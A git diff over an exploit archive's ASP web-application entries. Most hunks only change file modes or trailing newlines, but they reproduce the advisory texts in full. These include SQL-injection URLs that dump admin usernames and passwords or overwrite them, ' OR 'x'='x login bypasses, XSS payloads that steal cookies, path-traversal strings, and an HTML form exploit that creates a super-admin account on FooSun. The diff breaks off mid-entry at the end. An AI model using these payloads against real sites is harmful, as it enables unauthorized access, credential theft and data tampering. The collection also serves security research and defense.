mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/3062.txt b/platforms/asp/webapps/3062.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/30621.txt b/platforms/asp/webapps/30621.txt old mode 100755 new mode 100644 index cbfae366d..6f7b71340 --- a/platforms/asp/webapps/30621.txt +++ b/platforms/asp/webapps/30621.txt @@ -4,4 +4,4 @@ Novus is prone to a cross-site scripting vulnerability because the application f An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/buscar.asp?p=[XSS] \ No newline at end of file +http://www.example.com/buscar.asp?p=[XSS] \ No newline at end of file diff --git a/platforms/asp/webapps/30624.txt b/platforms/asp/webapps/30624.txt old mode 100755 new mode 100644 index c7f6b30bb..498e0f490 --- a/platforms/asp/webapps/30624.txt +++ b/platforms/asp/webapps/30624.txt @@ -4,4 +4,4 @@ Netkamp Emlak Scripti is prone to multiple input-validation vulnerabilities, inc A successful exploit may allow an attacker to steal cookie-based authentication credentials, execute malicious script code, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com.com/script_path/detay.asp?ilan_id=[SQL] \ No newline at end of file +http://www.example.com.com/script_path/detay.asp?ilan_id=[SQL] \ No newline at end of file diff --git a/platforms/asp/webapps/30625.txt b/platforms/asp/webapps/30625.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/30626.txt b/platforms/asp/webapps/30626.txt old mode 100755 new mode 100644 index 49355d35d..7084999ba --- a/platforms/asp/webapps/30626.txt +++ b/platforms/asp/webapps/30626.txt @@ -6,4 +6,4 @@ A successful exploit may allow an attacker to compromise the application, access Ohesa Emlak Portal 1.0 is vulnerable; other versions may also be affected. -http://www.example.com/detay.asp?Emlak=[SQL] \ No newline at end of file +http://www.example.com/detay.asp?Emlak=[SQL] \ No newline at end of file diff --git a/platforms/asp/webapps/30629.txt b/platforms/asp/webapps/30629.txt old mode 100755 new mode 100644 index 6fcd978a0..3beee561a --- a/platforms/asp/webapps/30629.txt +++ b/platforms/asp/webapps/30629.txt @@ -5,4 +5,4 @@ ASP Product Catalog is prone to an SQL-injection vulnerability because it fails Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/Catalog/default.asp?cid=8%20union%20all%20select%20Password,User_ID,Password,User_ID,Password,User_ID,Password%20from%20admin# -http://www.example.comdefault.asp?cid=-999 union select 0,user_id,password,3,4,5 from admin \ No newline at end of file +http://www.example.comdefault.asp?cid=-999 union select 0,user_id,password,3,4,5 from admin \ No newline at end of file diff --git a/platforms/asp/webapps/3066.txt b/platforms/asp/webapps/3066.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/3068.htm b/platforms/asp/webapps/3068.htm old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/30696.txt b/platforms/asp/webapps/30696.txt old mode 100755 new mode 100644 index 4dc48c2d7..dd3a0b7f0 --- a/platforms/asp/webapps/30696.txt +++ b/platforms/asp/webapps/30696.txt @@ -4,4 +4,4 @@ SearchSimon Lite is prone to a cross-site scripting vulnerability because the ap An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. -http://www.example/filename.asp?QUERY=[XSS]&Submit=Search%21&ACTION=SEARCH \ No newline at end of file +http://www.example/filename.asp?QUERY=[XSS]&Submit=Search%21&ACTION=SEARCH \ No newline at end of file diff --git a/platforms/asp/webapps/30706.txt b/platforms/asp/webapps/30706.txt old mode 100755 new mode 100644 index 78fb3705e..583a8973e --- a/platforms/asp/webapps/30706.txt +++ b/platforms/asp/webapps/30706.txt @@ -4,4 +4,4 @@ CodeWidgets Web Based Alpha Tabbed Address Book is prone to an SQL-injection vul Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.asp?alpha=[SQL INJECTION] \ No newline at end of file +http://www.example.com/index.asp?alpha=[SQL INJECTION] \ No newline at end of file diff --git a/platforms/asp/webapps/30708.txt b/platforms/asp/webapps/30708.txt old mode 100755 new mode 100644 index ebf602173..056f9b32a --- a/platforms/asp/webapps/30708.txt +++ b/platforms/asp/webapps/30708.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc Aleris Web Publishing Server 3.0 is vulnerable; other versions may also be affected. -www.example.com/calendar/page.asp?mode=1%20union%20all%20select%201,2,3,4,5,6%20FROM%20users-- \ No newline at end of file +www.example.com/calendar/page.asp?mode=1%20union%20all%20select%201,2,3,4,5,6%20FROM%20users-- \ No newline at end of file diff --git a/platforms/asp/webapps/3073.txt b/platforms/asp/webapps/3073.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/3074.txt b/platforms/asp/webapps/3074.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/30743.txt b/platforms/asp/webapps/30743.txt old mode 100755 new mode 100644 index 00f81f51f..48d81ee62 --- a/platforms/asp/webapps/30743.txt +++ b/platforms/asp/webapps/30743.txt @@ -6,4 +6,4 @@ Exploiting this issue may allow an unauthorized remote user to view arbitrary lo i-Gallery 3.4 is vulnerable to this issue; other versions may also be vulnerable. -http://www.example.com/gallery/igallery.asp?d=%5c../../%5c \ No newline at end of file +http://www.example.com/gallery/igallery.asp?d=%5c../../%5c \ No newline at end of file diff --git a/platforms/asp/webapps/30747.txt b/platforms/asp/webapps/30747.txt old mode 100755 new mode 100644 index 2dde3f163..f3eae9794 --- a/platforms/asp/webapps/30747.txt +++ b/platforms/asp/webapps/30747.txt @@ -4,4 +4,4 @@ Rapid Classified is prone to an SQL-injection vulnerability because the applicat A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. -http://www.example.com/agencyCatResult.asp?cmbCat='%20UPDATE%20rftCategory%20set%20Category%20=%20'Aria-Security Team';-- \ No newline at end of file +http://www.example.com/agencyCatResult.asp?cmbCat='%20UPDATE%20rftCategory%20set%20Category%20=%20'Aria-Security Team';-- \ No newline at end of file diff --git a/platforms/asp/webapps/30775.txt b/platforms/asp/webapps/30775.txt old mode 100755 new mode 100644 index 24c19b685..893dca2ed --- a/platforms/asp/webapps/30775.txt +++ b/platforms/asp/webapps/30775.txt @@ -10,4 +10,4 @@ JiRo's Banner System 2.0 is vulnerable; other versions may also be affected. The following proof-of-concept login and password examples are available: Login: anything' OR 'x'='x -Password: anything' OR 'x'='x \ No newline at end of file +Password: anything' OR 'x'='x \ No newline at end of file diff --git a/platforms/asp/webapps/30778.txt b/platforms/asp/webapps/30778.txt old mode 100755 new mode 100644 index 538e84cda..cf3335097 --- a/platforms/asp/webapps/30778.txt +++ b/platforms/asp/webapps/30778.txt @@ -7,4 +7,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc http://www.example.com/index.html?ClickAndRank/details.asp Username: anything' OR 'x'='x -Password: anything' OR 'x'='x \ No newline at end of file +Password: anything' OR 'x'='x \ No newline at end of file diff --git a/platforms/asp/webapps/30793.txt b/platforms/asp/webapps/30793.txt old mode 100755 new mode 100644 index 562f70012..a64736045 --- a/platforms/asp/webapps/30793.txt +++ b/platforms/asp/webapps/30793.txt @@ -8,4 +8,4 @@ The following proof-of-concept example is available: Login Page (Default.asp) -Password: anything' OR 'x'='x \ No newline at end of file +Password: anything' OR 'x'='x \ No newline at end of file diff --git a/platforms/asp/webapps/30794.txt b/platforms/asp/webapps/30794.txt old mode 100755 new mode 100644 index 6317903aa..898eaa458 --- a/platforms/asp/webapps/30794.txt +++ b/platforms/asp/webapps/30794.txt @@ -8,4 +8,4 @@ VUNET Case Manager 3.4 is vulnerable; other versions may also be affected. The following example password is available for the 'Login' page ('Default.asp'): -Password: anything' OR 'x'='x \ No newline at end of file +Password: anything' OR 'x'='x \ No newline at end of file diff --git a/platforms/asp/webapps/30796.txt b/platforms/asp/webapps/30796.txt old mode 100755 new mode 100644 index 008d79f44..fd48eae73 --- a/platforms/asp/webapps/30796.txt +++ b/platforms/asp/webapps/30796.txt @@ -4,4 +4,4 @@ E-vanced Solutions E-vents is prone to multiple input-validation vulnerabilities Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/eventsignup.asp?ID=4197 UNION ALL SELECT username, etc FROM users-- \ No newline at end of file +http://www.example.com/eventsignup.asp?ID=4197 UNION ALL SELECT username, etc FROM users-- \ No newline at end of file diff --git a/platforms/asp/webapps/30800.html b/platforms/asp/webapps/30800.html old mode 100755 new mode 100644 index 84e85fd94..321d29a12 --- a/platforms/asp/webapps/30800.html +++ b/platforms/asp/webapps/30800.html @@ -4,4 +4,4 @@ FooSun is prone to an SQL-injection vulnerability because it fails to sufficient Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML><HEAD><TITLE>foosun create new admin exp Codz By flyh4t</TITLE> <META http-equiv=Content-Type content="text/html; charset=gb2312"> <META content="MSHTML 6.00.2800.1479" name=GENERATOR></HEAD> <BODY style="FONT-SIZE: 9pt">------------------------ foosun create new admin exp Codz By flyh4t --------------------------- <FORM name=frm method=post target=_blank>foosun path: <INPUT style="BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: 1px solid; BORDER-BOTTOM: 1px solid" size=65 value=http://demo.foosun.net name=act><br> <INPUT type="hidden" style="BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: 1px solid; BORDER-BOTTOM: 1px solid" size=65 value=/api/Api_response.asp?syskey=8076ac99d47feeb6&password=flyh4t&SaveCookie=1&UserName=flyh4t';insert%20into%20FS_MF_Admin%20(Admin_Name,Admin_Pass_Word,Admin_Is_Super)values(0x6F006C0064006A0075006E00,0x3800330061006100340030003000610066003400360034006300370036006400,1)-- name=sql><br> <INPUT onclick="Javascipt:frm.action=document.all.act.value+document.all.sql.value; frm. submit();" type=button value=". ." name=Send></FORM> Hey boy, fun the game... <br> It is just a exp for the bug of foosun...<br> can create a new admin oldjun/12345678...<br> </BODY> </HTML> \ No newline at end of file +!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML><HEAD><TITLE>foosun create new admin exp Codz By flyh4t</TITLE> <META http-equiv=Content-Type content="text/html; charset=gb2312"> <META content="MSHTML 6.00.2800.1479" name=GENERATOR></HEAD> <BODY style="FONT-SIZE: 9pt">------------------------ foosun create new admin exp Codz By flyh4t --------------------------- <FORM name=frm method=post target=_blank>foosun path: <INPUT style="BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: 1px solid; BORDER-BOTTOM: 1px solid" size=65 value=http://demo.foosun.net name=act><br> <INPUT type="hidden" style="BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: 1px solid; BORDER-BOTTOM: 1px solid" size=65 value=/api/Api_response.asp?syskey=8076ac99d47feeb6&password=flyh4t&SaveCookie=1&UserName=flyh4t';insert%20into%20FS_MF_Admin%20(Admin_Name,Admin_Pass_Word,Admin_Is_Super)values(0x6F006C0064006A0075006E00,0x3800330061006100340030003000610066003400360034006300370036006400,1)-- name=sql><br> <INPUT onclick="Javascipt:frm.action=document.all.act.value+document.all.sql.value; frm. submit();" type=button value=". ." name=Send></FORM> Hey boy, fun the game... <br> It is just a exp for the bug of foosun...<br> can create a new admin oldjun/12345678...<br> </BODY> </HTML> \ No newline at end of file diff --git a/platforms/asp/webapps/30807.txt b/platforms/asp/webapps/30807.txt old mode 100755 new mode 100644 index dbedf3d0a..12faf5cd2 --- a/platforms/asp/webapps/30807.txt +++ b/platforms/asp/webapps/30807.txt @@ -7,4 +7,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc The following proof of concept is available: Username: Admin -Password: anything' OR 'x'='x \ No newline at end of file +Password: anything' OR 'x'='x \ No newline at end of file diff --git a/platforms/asp/webapps/30841.txt b/platforms/asp/webapps/30841.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/30842.txt b/platforms/asp/webapps/30842.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/30843.txt b/platforms/asp/webapps/30843.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/30844.txt b/platforms/asp/webapps/30844.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/30845.txt b/platforms/asp/webapps/30845.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/30855.txt b/platforms/asp/webapps/30855.txt old mode 100755 new mode 100644 index 2c6cbf954..bf82dadde --- a/platforms/asp/webapps/30855.txt +++ b/platforms/asp/webapps/30855.txt @@ -6,4 +6,4 @@ Exploiting these issues could allow an attacker to compromise the application, a WebDoc 3.0 is vulnerable; other versions may also be affected. -http://www.example.com/categories.asp?document_id=37&cat_id=convert(int,(select+@@version));-- \ No newline at end of file +http://www.example.com/categories.asp?document_id=37&cat_id=convert(int,(select+@@version));-- \ No newline at end of file diff --git a/platforms/asp/webapps/30860.txt b/platforms/asp/webapps/30860.txt old mode 100755 new mode 100644 index 8cee405ca..dba2c849b --- a/platforms/asp/webapps/30860.txt +++ b/platforms/asp/webapps/30860.txt @@ -8,4 +8,4 @@ These issues affect bttlxe Forum 2.0; other versions may also be affected. http://www.example.com/myaccount/viewProfile.asp?member='update Members set ProfileName='hacked';-- http://www.example.com/myaccount/viewProfile.asp?member='update Members set Password='hacked';-- -http://www.example.com/myaccount/failure.asp?err_txt="><script>alert('Aria-Security.Net')</script> \ No newline at end of file +http://www.example.com/myaccount/failure.asp?err_txt="><script>alert('Aria-Security.Net')</script> \ No newline at end of file diff --git a/platforms/asp/webapps/3089.txt b/platforms/asp/webapps/3089.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/30938.txt b/platforms/asp/webapps/30938.txt old mode 100755 new mode 100644 index 0f5abacba..6ae5319aa --- a/platforms/asp/webapps/30938.txt +++ b/platforms/asp/webapps/30938.txt @@ -6,4 +6,4 @@ A successful exploit could allow an attacker to compromise the application, acce These issues affect Web Sihirbazi 5.1.1; other versions may also be affected. -http://www.example.com/[script_path]/default.asp?page=news&id=-2+union+all+select+0,kullaniciadi,sifre,3+from+user http://www.example.com/[script_path]/default.asp?pageid=-7+union+all+select+0,1,2,kullaniciadi,sifre,5+from+user \ No newline at end of file +http://www.example.com/[script_path]/default.asp?page=news&id=-2+union+all+select+0,kullaniciadi,sifre,3+from+user http://www.example.com/[script_path]/default.asp?pageid=-7+union+all+select+0,1,2,kullaniciadi,sifre,5+from+user \ No newline at end of file diff --git a/platforms/asp/webapps/30940.txt b/platforms/asp/webapps/30940.txt old mode 100755 new mode 100644 index 6d14e022d..295b27367 --- a/platforms/asp/webapps/30940.txt +++ b/platforms/asp/webapps/30940.txt @@ -8,4 +8,4 @@ All versions are considered vulnerable. http://www.example.com/forum/login_user.asp?Redirect=/forum/search.asp@KW=%22%3E%3 Cscript%3Ealert(document.cookie);%3C/script%3E -http://www.example.com/forum/login_user.asp?Redirect=/members.asp?SF=%22%3E%3Cscri pt%3Ealert(document.cookie);%3C/script%3E \ No newline at end of file +http://www.example.com/forum/login_user.asp?Redirect=/members.asp?SF=%22%3E%3Cscri pt%3Ealert(document.cookie);%3C/script%3E \ No newline at end of file diff --git a/platforms/asp/webapps/30941.txt b/platforms/asp/webapps/30941.txt old mode 100755 new mode 100644 index 15db6ab80..7b31c9657 --- a/platforms/asp/webapps/30941.txt +++ b/platforms/asp/webapps/30941.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br All versions are considered vulnerable. -http://www.example.com/Path/blogs.asp?CID=0&AID=0&Date=%22%3E%3Cscript%3Ea lert(document.cookie);%3C/script%3E \ No newline at end of file +http://www.example.com/Path/blogs.asp?CID=0&AID=0&Date=%22%3E%3Cscript%3Ea lert(document.cookie);%3C/script%3E \ No newline at end of file diff --git a/platforms/asp/webapps/30963.txt b/platforms/asp/webapps/30963.txt old mode 100755 new mode 100644 index a54047458..c2201db38 --- a/platforms/asp/webapps/30963.txt +++ b/platforms/asp/webapps/30963.txt @@ -7,4 +7,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc The following proof of concept is available: Username: Admin -Password: anything' OR 'x'='x \ No newline at end of file +Password: anything' OR 'x'='x \ No newline at end of file diff --git a/platforms/asp/webapps/30993.txt b/platforms/asp/webapps/30993.txt old mode 100755 new mode 100644 index dccfb3268..f977632cf --- a/platforms/asp/webapps/30993.txt +++ b/platforms/asp/webapps/30993.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br Snitz Forums 2000 2.4.05 and 3.4.06 are vulnerable; other versions may also be affected. -http://www.example.com/Forums/setup.asp?RC=3&MAIL=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E http://www.example.com/login.asp?target=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E \ No newline at end of file +http://www.example.com/Forums/setup.asp?RC=3&MAIL=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E http://www.example.com/login.asp?target=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E \ No newline at end of file diff --git a/platforms/asp/webapps/31017.php b/platforms/asp/webapps/31017.php old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/31042.txt b/platforms/asp/webapps/31042.txt old mode 100755 new mode 100644 index 280f73787..93718b39b --- a/platforms/asp/webapps/31042.txt +++ b/platforms/asp/webapps/31042.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow MegaBBS 1.5.14b is vulnerable; other versions may also be affected. -http://www.example.com/path/profile-upload/upload.asp?target=code \ No newline at end of file +http://www.example.com/path/profile-upload/upload.asp?target=code \ No newline at end of file diff --git a/platforms/asp/webapps/3105.txt b/platforms/asp/webapps/3105.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/31055.txt b/platforms/asp/webapps/31055.txt old mode 100755 new mode 100644 index 96580c393..6083993cd --- a/platforms/asp/webapps/31055.txt +++ b/platforms/asp/webapps/31055.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to retrieve arbitrary files in the context of This issue affects Forums 9.07, NewsPad 1.02, and Rich Text Editor 4.0; other versions may also be vulnerable. -http://www.example.com/RTE_file_browser.asp?look=&sub=\.....\\\.....\\\.....\\http://www.example.com/RTE_file_browser.asp?look=save&sub=\.....\\\.....\\\.....\\\.....\\\.....\\\ \ No newline at end of file +http://www.example.com/RTE_file_browser.asp?look=&sub=\.....\\\.....\\\.....\\http://www.example.com/RTE_file_browser.asp?look=save&sub=\.....\\\.....\\\.....\\\.....\\\.....\\\ \ No newline at end of file diff --git a/platforms/asp/webapps/31058.txt b/platforms/asp/webapps/31058.txt old mode 100755 new mode 100644 index a08c3905b..57140fe23 --- a/platforms/asp/webapps/31058.txt +++ b/platforms/asp/webapps/31058.txt @@ -6,4 +6,4 @@ Exploiting these issues could allow an attacker to compromise the application, a Passing the following will bypass the authentication process: -' or ' \ No newline at end of file +' or ' \ No newline at end of file diff --git a/platforms/asp/webapps/31059.txt b/platforms/asp/webapps/31059.txt old mode 100755 new mode 100644 index 1089dfb0a..c45e79bc1 --- a/platforms/asp/webapps/31059.txt +++ b/platforms/asp/webapps/31059.txt @@ -10,4 +10,4 @@ Passing: ' or ' -will bypass the authentication process. \ No newline at end of file +will bypass the authentication process. \ No newline at end of file diff --git a/platforms/asp/webapps/31070.txt b/platforms/asp/webapps/31070.txt old mode 100755 new mode 100644 index 2e3608a51..980947492 --- a/platforms/asp/webapps/31070.txt +++ b/platforms/asp/webapps/31070.txt @@ -10,4 +10,4 @@ Passing: ' or ' -will bypass the authentication process. \ No newline at end of file +will bypass the authentication process. \ No newline at end of file diff --git a/platforms/asp/webapps/31103.txt b/platforms/asp/webapps/31103.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/31104.txt b/platforms/asp/webapps/31104.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/31117.txt b/platforms/asp/webapps/31117.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/3115.txt b/platforms/asp/webapps/3115.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/31191.txt b/platforms/asp/webapps/31191.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/31275.txt b/platforms/asp/webapps/31275.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/31276.txt b/platforms/asp/webapps/31276.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/31286.txt b/platforms/asp/webapps/31286.txt old mode 100755 new mode 100644 index 8ad207f28..fbe0c2e8a --- a/platforms/asp/webapps/31286.txt +++ b/platforms/asp/webapps/31286.txt @@ -4,4 +4,4 @@ Citrix MetaFrame Web Manager is prone to a cross-site scripting vulnerability be An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. -http://www.example.com/Citrix/MetaFrameXP/default/login.asp?NFuse_LogoutId=Off&NFuse_MessageType=warning&NFuse_Message=%3Cscript%3Ealert(document.cookie);%3C/script%3E \ No newline at end of file +http://www.example.com/Citrix/MetaFrameXP/default/login.asp?NFuse_LogoutId=Off&NFuse_MessageType=warning&NFuse_Message=%3Cscript%3Ealert(document.cookie);%3C/script%3E \ No newline at end of file diff --git a/platforms/asp/webapps/31314.txt b/platforms/asp/webapps/31314.txt old mode 100755 new mode 100644 index cba398a94..d62751d4a --- a/platforms/asp/webapps/31314.txt +++ b/platforms/asp/webapps/31314.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br AuthentiX 6.3b1 Trial Version is vulnerable; other versions may also be affected. -https://www.example.com/aspAdmin/editUser.asp?username=%3CMETA%20HTTP-EQUIV=%22refresh%22%20CONTENT=%220;%20URL=http://www.example2.com/%22%3E \ No newline at end of file +https://www.example.com/aspAdmin/editUser.asp?username=%3CMETA%20HTTP-EQUIV=%22refresh%22%20CONTENT=%220;%20URL=http://www.example2.com/%22%3E \ No newline at end of file diff --git a/platforms/asp/webapps/3135.txt b/platforms/asp/webapps/3135.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/31404.txt b/platforms/asp/webapps/31404.txt old mode 100755 new mode 100644 index 6e1b022f9..f65da08a5 --- a/platforms/asp/webapps/31404.txt +++ b/platforms/asp/webapps/31404.txt @@ -5,4 +5,4 @@ Virtual Support Office XP (VSO-XP) is prone to an SQL-injection vulnerability be Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/MyIssuesView.asp?Issue_ID=-1%20having%201=1-- -http://www.example.com/MyIssuesView.asp?Issue_ID=-1 update QIssues set column='hacked';-- \ No newline at end of file +http://www.example.com/MyIssuesView.asp?Issue_ID=-1 update QIssues set column='hacked';-- \ No newline at end of file diff --git a/platforms/asp/webapps/31413.txt b/platforms/asp/webapps/31413.txt old mode 100755 new mode 100644 index 63cd2c772..b9e4e7e34 --- a/platforms/asp/webapps/31413.txt +++ b/platforms/asp/webapps/31413.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Imperva SecureSphere 5.0 MX Management Server is vulnerable. -http://www.example.con/%20<script>alert(window.location=(window.location+"a").slice(0,48)+"view=activateSettingObj&popUpViewRequest=activatePopup&view_func=frameset&view_module=activate_setting");</script>/*.aspx \ No newline at end of file +http://www.example.con/%20<script>alert(window.location=(window.location+"a").slice(0,48)+"view=activateSettingObj&popUpViewRequest=activatePopup&view_func=frameset&view_module=activate_setting");</script>/*.aspx \ No newline at end of file diff --git a/platforms/asp/webapps/31442.txt b/platforms/asp/webapps/31442.txt old mode 100755 new mode 100644 index 786467638..da578ec0c --- a/platforms/asp/webapps/31442.txt +++ b/platforms/asp/webapps/31442.txt @@ -4,4 +4,4 @@ PortalApp is prone to an SQL-injection vulnerability because it fails to suffici Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/path/links.asp?CatId=-99999%20UNION%20SELECT%20null,accesslevel,null,null,user_name,%205%20,password,null%20FROM%20Users \ No newline at end of file +http://www.example.com/path/links.asp?CatId=-99999%20UNION%20SELECT%20null,accesslevel,null,null,user_name,%205%20,password,null%20FROM%20Users \ No newline at end of file diff --git a/platforms/asp/webapps/31463.txt b/platforms/asp/webapps/31463.txt old mode 100755 new mode 100644 index 375b72027..baf2d4238 --- a/platforms/asp/webapps/31463.txt +++ b/platforms/asp/webapps/31463.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc http://www.example.com/content_by_cat.asp?contentid=99999999&catid=-99887766+UNION+SELECT+0,null,password,3,accesslevel,5,null,7,null,user_name+from+users -http://www.example.com/content_by_cat.asp?contentid=-99999999&catid=-99887766+union+select+0,null,password,3,accesslevel,5,null,7,8,user_name+from+users \ No newline at end of file +http://www.example.com/content_by_cat.asp?contentid=-99999999&catid=-99887766+union+select+0,null,password,3,accesslevel,5,null,7,8,user_name+from+users \ No newline at end of file diff --git a/platforms/asp/webapps/31546.txt b/platforms/asp/webapps/31546.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/31547.txt b/platforms/asp/webapps/31547.txt old mode 100755 new mode 100644 index a779d79b9..f76b26074 --- a/platforms/asp/webapps/31547.txt +++ b/platforms/asp/webapps/31547.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br DigiDomain 2.2 is vulnerable; other versions may also be affected. -http://www.www.example.com/lookup/suggest_result.asp?domain=.com&tld=&user=&selecte=1&word1=[XSS]&word2=[XSS] \ No newline at end of file +http://www.www.example.com/lookup/suggest_result.asp?domain=.com&tld=&user=&selecte=1&word1=[XSS]&word2=[XSS] \ No newline at end of file diff --git a/platforms/asp/webapps/31582.txt b/platforms/asp/webapps/31582.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/31644.txt b/platforms/asp/webapps/31644.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/31645.txt b/platforms/asp/webapps/31645.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/31646.txt b/platforms/asp/webapps/31646.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/31648.txt b/platforms/asp/webapps/31648.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/31649.txt b/platforms/asp/webapps/31649.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/31650.txt b/platforms/asp/webapps/31650.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/31666.txt b/platforms/asp/webapps/31666.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/31797.txt b/platforms/asp/webapps/31797.txt old mode 100755 new mode 100644 index 821ec675d..d41ad1af6 --- a/platforms/asp/webapps/31797.txt +++ b/platforms/asp/webapps/31797.txt @@ -6,4 +6,4 @@ Exploiting these issues could allow an attacker to compromise the application, a Philboard 0.5 is vulnerable; other versions may also be affected. -http://www.example.com:2222/lab/philboard_v5/W1L3D4_foruma_yeni_konu_ac.asp?forumid=1+union+select+0,1,(username),(password),1,1+from+users \ No newline at end of file +http://www.example.com:2222/lab/philboard_v5/W1L3D4_foruma_yeni_konu_ac.asp?forumid=1+union+select+0,1,(username),(password),1,1+from+users \ No newline at end of file diff --git a/platforms/asp/webapps/31811.txt b/platforms/asp/webapps/31811.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/31812.txt b/platforms/asp/webapps/31812.txt old mode 100755 new mode 100644 index 68f6c7ab7..7c6aeadd8 --- a/platforms/asp/webapps/31812.txt +++ b/platforms/asp/webapps/31812.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc DizaynPlus Nobetci Eczane Takip 1.0 is vulnerable; other versions may also be affected. -http://www.example.com/lab/nobetcideczane/ayrinti.asp?anahtar=1+union+select+0,1,2,(admin),sifre,5+from+yetkili \ No newline at end of file +http://www.example.com/lab/nobetcideczane/ayrinti.asp?anahtar=1+union+select+0,1,2,(admin),sifre,5+from+yetkili \ No newline at end of file diff --git a/platforms/asp/webapps/31843.txt b/platforms/asp/webapps/31843.txt old mode 100755 new mode 100644 index 2ce0257f5..cadc39728 --- a/platforms/asp/webapps/31843.txt +++ b/platforms/asp/webapps/31843.txt @@ -5,4 +5,4 @@ Excuse Online is prone to an SQL-injection vulnerability because it fails to suf Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/excuse/MainProgram/pwd.asp?pwd=blah&pID='+or+???+like+'%25 -http://www.example.com/excuse/MainProgram/pwd.asp?pwd=blah&pID='+or+??+like+'%25 \ No newline at end of file +http://www.example.com/excuse/MainProgram/pwd.asp?pwd=blah&pID='+or+??+like+'%25 \ No newline at end of file diff --git a/platforms/asp/webapps/31850.txt b/platforms/asp/webapps/31850.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/31851.txt b/platforms/asp/webapps/31851.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/31852.txt b/platforms/asp/webapps/31852.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/31854.html b/platforms/asp/webapps/31854.html old mode 100755 new mode 100644 index 371532b98..8d0eac738 --- a/platforms/asp/webapps/31854.html +++ b/platforms/asp/webapps/31854.html @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability to gain unauthorized administrative a The Campus Request Repairs 